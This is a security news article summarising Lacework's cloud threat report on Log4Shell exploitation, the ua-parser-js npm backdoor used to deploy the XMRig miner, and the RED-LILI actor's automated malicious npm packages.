In the latest cloud threat report by Lacework, it was disclosed that the infamous Log4Shell vulnerability was exploited as an initial infection vector in 31% of cases identified by Lacework researchers over the past six months.
The software vendor’s report confirms that the Log4j vulnerability was abused extensively by malicious actors, as cybersecurity researchers had suspected when it emerged in December last year.
According to Lacework Labs, it initially noticed a flood of requests with malicious payloads immediately after the Log4Shell bug was disclosed, these were the result mainly of researchers searching for the vulnerability. However, these were replaced by malign requests over time, as threat actors adopted publicly available proof-of-concept exploits.
“Over time, we watched scanning activity evolve into more frequent attacks, including some that deployed crypto-miners and Distributed Denial of Service (DDoS) bots to affected systems,” it explained. In addition to improving their payloads, adversaries continued to adapt their exploitation methods to stay ahead of signature-based detections used by many types of security products.”
In addition to Log4j, multiple threat actors have also employed one backdoor in the ua-parser-js NPM package to secure access to Linux systems and launch the XMRig open-source miner. The original hacking group had managed to exploit the NPM developer’s account to deploy a malicious payload to the package.
In fact, malicious actors increasingly favor NPM as a vector for attack. A report from Checkmarx this week claimed that attackers have simplified the process of designing new NPM accounts from which to distribute supply chain malware.
“The attacker has fully automated the process of NPM account creation and has open dedicated accounts, one per package, making his new malicious packages much harder to spot,” it explained. At the time of writing, the threat actor ‘RED-LILI’ is still active at the time of writing and continues to publish malicious packages.”
The researchers at Lacework Labs also investigated issues around compliance, compromised Docker APIs and malicious containers, and additional bugs within the software supply chain. Based on the findings of this report, researchers advised that defenders should evaluate security infrastructure against the industry's best practices and execute proactive defence and intelligence weapons with active bug monitoring.
